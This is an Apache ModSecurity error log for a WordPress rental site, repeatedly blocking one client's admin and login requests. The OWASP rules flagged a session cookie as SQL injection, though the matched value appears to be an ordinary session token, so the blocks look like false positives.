[Mon May 11 18:34:59.524166 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFMw-Qm4vhlWBPlMjm5AAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:59.915919 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFMw-Qm4vhlWBPlMjm5AAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:00.203346 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFNA-Qm4vhlWBPlMjm5QAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:00.203634 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFNA-Qm4vhlWBPlMjm5QAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:00.806130 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFNA-Qm4vhlWBPlMjm5QAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:01.124314 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFNQ-Qm4vhlWBPlMjm5gAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:01.124639 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFNQ-Qm4vhlWBPlMjm5gAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:01.785855 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFNQ-Qm4vhlWBPlMjm5gAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:02.140150 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFNg-Qm4vhlWBPlMjm5wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:02.140468 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFNg-Qm4vhlWBPlMjm5wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:02.743596 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFNg-Qm4vhlWBPlMjm5wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:03.003998 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFNw-Qm4vhlWBPlMjm6AAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:03.004302 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFNw-Qm4vhlWBPlMjm6AAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:03.586207 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFNw-Qm4vhlWBPlMjm6AAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:03.835762 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFNw-Qm4vhlWBPlMjm6QAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:03.836048 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFNw-Qm4vhlWBPlMjm6QAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:04.445011 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFNw-Qm4vhlWBPlMjm6QAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:04.557125 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFOA-Qm4vhlWBPlMjm6gAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:04.557538 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFOA-Qm4vhlWBPlMjm6gAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:04.934429 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFOA-Qm4vhlWBPlMjm6gAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:05.608895 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFOQ-Qm4vhlWBPlMjm6wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:05.609188 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFOQ-Qm4vhlWBPlMjm6wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:06.217915 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFOQ-Qm4vhlWBPlMjm6wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:06.558944 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFOg-Qm4vhlWBPlMjm7AAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:06.559369 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFOg-Qm4vhlWBPlMjm7AAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:07.157359 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFOg-Qm4vhlWBPlMjm7AAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:07.566444 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFOw-Qm4vhlWBPlMjm7QAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:07.566914 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFOw-Qm4vhlWBPlMjm7QAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:08.225286 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFOw-Qm4vhlWBPlMjm7QAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:08.444885 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFPA-Qm4vhlWBPlMjm8AAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:08.445187 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFPA-Qm4vhlWBPlMjm8AAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:09.032609 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFPA-Qm4vhlWBPlMjm8AAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:09.220483 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFPQ-Qm4vhlWBPlMjm8QAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:09.220774 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFPQ-Qm4vhlWBPlMjm8QAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:09.762581 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFPQ-Qm4vhlWBPlMjm8QAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:09.909064 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id 